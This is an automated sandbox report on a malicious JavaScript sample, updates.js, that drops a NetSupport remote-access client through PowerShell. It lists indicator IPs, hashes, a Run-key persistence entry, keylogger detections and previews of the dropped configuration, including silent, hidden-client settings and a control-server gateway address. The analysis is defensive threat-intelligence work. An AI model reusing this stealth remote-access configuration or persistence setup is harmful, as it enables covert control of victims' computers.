194.180.191.69 | unknown | unknown | 39798 | MIVOCLOUDMD | false
104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1475034
                                    Start date and time:2024-07-17 15:18:51 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:updates.js
                                    Detection:MAL
                                    Classification:mal100.rans.troj.expl.evad.winJS@8/28@2/3
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 77%
                                    • Number of executed functions: 160
                                    • Number of non-executed functions: 211
                                    Cookbook Comments:
                                    • Found application associated with file extension: .js
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 612 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: updates.js
Time | Type | Description
09:19:55 | API Interceptor | 46x Sleep call for process: powershell.exe modified
09:20:32 | API Interceptor | 6880819x Sleep call for process: client32.exe modified
15:20:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BTGEEENA C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
15:20:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BTGEEENA C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            Process:C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:modified
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.077819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:llD:b
                                                                            MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                            SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                            SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                            SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:40.7357,-74.1724
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1524
                                                                            Entropy (8bit):5.388328299240194
                                                                            Encrypted:false
                                                                            SSDEEP:24:3DWNn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNmwr8HJYBlD3RB4:zWNn4SU4y4RQmFoUeCamfm9qr9tK8NfS
                                                                            MD5:3DBF3D5F5D6A95056B62408649E01725
                                                                            SHA1:272E78868CE282D692CB98D878A508FD2986A5EC
                                                                            SHA-256:7C50931C091BE0E0C57DCEC412C9B331C092B0BBAE63A2BC2BE0BFE561FCAC69
                                                                            SHA-512:ACAD6170C901B475DBD9054BD70BE342C50B266CC73C73CA478812CA42ADA332088E148217DAA4D8FFAD5557FB17DA9056F1BB5B43CE5E4F076BCEF4CBBE7E2A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:@...e...........8.....................R..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):328056
                                                                            Entropy (8bit):6.7547459359511395
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Joe Sandbox View:
                                                                            • Filename: updates.js, Detection: malicious
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                            • Filename: updates.js, Detection: malicious
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious
                                                                            • Filename: update.js, Detection: malicious
                                                                            • Filename: Update_122.0.616.js, Detection: malicious
                                                                            • Filename: BILL93607.js, Detection: malicious
                                                                            • Filename: , Detection: malicious
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):195
                                                                            Entropy (8bit):4.924914741174998
                                                                            Encrypted:false
                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                            Malicious:true
                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Generic INItialization configuration [Features]
                                                                            Category:dropped
                                                                            Size (bytes):6458
                                                                            Entropy (8bit):4.645519507940197
                                                                            Encrypted:false
                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                            Malicious:false
                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18808
                                                                            Entropy (8bit):6.292094060787929
                                                                            Encrypted:false
                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Joe Sandbox View:
                                                                            • Filename: updates.js, Detection: malicious
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                            • Filename: updates.js, Detection: malicious
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious
                                                                            • Filename: update.js, Detection: malicious
                                                                            • Filename: Update_122.0.616.js, Detection: malicious
                                                                            • Filename: BILL93607.js, Detection: malicious
                                                                            • Filename: , Detection: malicious
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3740024
                                                                            Entropy (8bit):6.527276298837004
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):396664
                                                                            Entropy (8bit):6.80911343409989
                                                                            Encrypted:false
                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1447
                                                                            Entropy (8bit):5.302827444337103
                                                                            Encrypted:false
                                                                            SSDEEP:24:2dt4uiNK+bIgMy5PYMPgiE/M7cJ3Zb2WF+HZ6iYzDfDJ6:cSVK+bIgMyRYSzIlz+HZ6XDfDJ6
                                                                            MD5:FFCF52AB3F76D8FB8E0C0ECA5F858F01
                                                                            SHA1:5EC475C9A55DA6684372373D6DFC5D13B3DE48CF
                                                                            SHA-256:8B6F3769FC0367421E2748C9775BBF16645B502621A8AEEF4974C58BFA067864
                                                                            SHA-512:0E64B1E26130E5A854BB3E321D529957CEE47BEC99D4A0E3A80FCF268661FD5F9DC96E2386FE3EE29654524D03CA900CC7A7CD2499742EB01711AA66DC2A03CB
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>.. <s
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103824
                                                                            Entropy (8bit):6.674952714045651
                                                                            Encrypted:false
                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):670
                                                                            Entropy (8bit):5.4168263644841295
                                                                            Encrypted:false
                                                                            SSDEEP:12:v6fxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXoKIDWQCYnmSulA4Ea:CfI2hzEPI8ZNR8pivlnxOoG1fXtID/Yd
                                                                            MD5:8684F84C76C111C4D47DD49106775030
                                                                            SHA1:620A70CB5D9A4E0D10B2D86EE0DDECDAAC1575B7
                                                                            SHA-256:C01152C4B80841F2A4900513FDED183F2DBD8D7D57E84744B0AE8E6068060C37
                                                                            SHA-512:4C5D39FFB3BF1BC0F50AEDF1B76B34CB1D47C87ED31102335280F1A48F9B289084F397A477F006999A43B7D024ADA4AE020330B41888E77F8320762AABAEBBF0
                                                                            Malicious:false
                                                                            Preview:0x39c9b7ae....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=194.180.191.69:443..gskmode=0..GSK=EL:M=OBKFDHG>CBDFIHM=HBG..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8
                                                                            Entropy (8bit):2.25
                                                                            Encrypted:false
                                                                            SSDEEP:3:SVyn:Ssn
                                                                            MD5:17412178172B24C5E570F6F13C42F4C0
                                                                            SHA1:F0AAC01BDD57F034D9CDA7DBEC9DD97C0DCB81EB
                                                                            SHA-256:2F2BB8B0A74E9049F4EE9DD039D81BC853FA8DB3F311A799032F002B9CC1DE41
                                                                            SHA-512:3B9808F22E3455505DA42B26D3C0C0D56CBAC41FD0D2076C3363273D9E77064047D8FC7B969612A5F5C78E0588F510DDD5B2173BE224B1B5EEDC5E51E9E5A92E
                                                                            Malicious:false
                                                                            Preview:1.0.1244
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):366601
                                                                            Entropy (8bit):5.662364865781263
                                                                            Encrypted:false
                                                                            SSDEEP:6144:vxWr2xoTIpupSwg1QMMXntfaY46yX1/PrMN8xKHfHqzHs:8r2WTqUl5MOnqavqY
                                                                            MD5:1761DC1760C752B6A16BF6F8797B207B
                                                                            SHA1:AE0C16AF795ADA3047F086DC841F66FF561FF139
                                                                            SHA-256:8C437A858E53894C6072D521459662FECEB3B1E416F62F3F4961D1F6C62B4C9D
                                                                            SHA-512:EBCE0FE7F70E4F8698B3A758C58309F461A25DDFFA413B8440EDFE593F70EE4D26046E3FE36EB1F01A4C0FA042270EAB29D2D717B0A02F1994870E1D9F4BBE09
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):474195
                                                                            Entropy (8bit):5.557096749384389
                                                                            Encrypted:false
                                                                            SSDEEP:12288:EpFCZh0dne0ymuV8iObj/9XY441LSPwOi6PtQE0sIkcOBZfb9NVmEV//QpSY:EPC/9VVLcd/Qj
                                                                            MD5:DDFCAC89248FDC7C51C1A932B6AC1C37
                                                                            SHA1:B16577290A95346B74C84D95F3B3763219BE999C
                                                                            SHA-256:9FCB23EDFB0C68015EB5DC54B2FA48E2E5C3410FACD56547A33B6888EC71E079
                                                                            SHA-512:84E812C5E0FD0F61EC370D3751ED5F0059E62566E8BE125D705B37DCDB5A04B82399D531C261278D4E9292923EDBCE67B49CFCEB57263B83292C695F745732ED
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):4.67078204534958
                                                                            Encrypted:false
                                                                            SSDEEP:3:mifFuY9HnQA5JVPqS18iMDXAh/OR6TAulLvPxAUNV/RWFVXAkEpMgMYv:v5975JVSS18iMkh26Vlp//gQNMC
                                                                            MD5:CBA80EE11DE525535BF2068AC23107B0
                                                                            SHA1:479C817E5B4AE2E49E1E950359F072DD8A8D227F
                                                                            SHA-256:333654272A482DC66A15D07C778CDFED72E74F6FA50342F00995E26F5DC7678F
                                                                            SHA-512:5ACDFD8874E3506C65446F5B5022879B74D5FAA4D05AF36C9835A35E542BAB21D81AF0F334403F9F3597B12C20C52E2DE9377ED7B22466DEA3D7ECE47810D5F8
                                                                            Malicious:false
                                                                            Preview:{. "name": "MEI Preload", . "icons": {}, . "version": "1.0.7.1652906823", . "manifest_version": 2, . "description": "Contains preloaded data for Media Engagement".}.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):428738
                                                                            Entropy (8bit):5.633613175057363
                                                                            Encrypted:false
                                                                            SSDEEP:6144:PO9/3sERZht7a5XBZLE2mV9RfPLyJDPrwnCWacgjjW5cRE0O2fGOGwNws/08gh8h:FER8XzwPgnma9
                                                                            MD5:0E95005552BA506314B1591376EB9D75
                                                                            SHA1:58B3C2EC36D3738AB8E10105C12BE1784C627F31
                                                                            SHA-256:72CB1CBC47EC3D560E02A19B4A9DF7FF6C4E232CA98286158E78CFF346A4CD46
                                                                            SHA-512:88FDDFD0E22C4A21A36C97E27758149691D7E61F8C44CF69AAF3C9CE977CB29FA0949A76BF343A36D352B48BDCBD66C8AD6CEB6FAB7C247A73BDAA4116A314B7
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):361713
                                                                            Entropy (8bit):6.790395434377143
                                                                            Encrypted:false
                                                                            SSDEEP:6144:nBWo6FHO66dFrmKSvqRSRbq9SgvFzJlkVDE:nBWoo563rnyrgtzJlku
                                                                            MD5:B854863EDFE51CED85381590992C1DEA
                                                                            SHA1:5202285EAC135C1D444459E0969D1481833EEA8E
                                                                            SHA-256:41DA1543A2E58B1932EF7E525A93BB3336CBE6CB6AB0648A604D0E59589931EF
                                                                            SHA-512:3C3D1887D99063BA2938D844C2A5FB2F9FDB2FB043347BFC5DD2A0907CD2F1FCF8F25D6B36728D4531E68171055DFD58D82FED636BBE72F46E7076748AC0D6B8
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1794
                                                                            Entropy (8bit):3.5509498109363986
                                                                            Encrypted:false
                                                                            SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                            MD5:3F78A0569C858AD26452633157103095
                                                                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                            Malicious:false
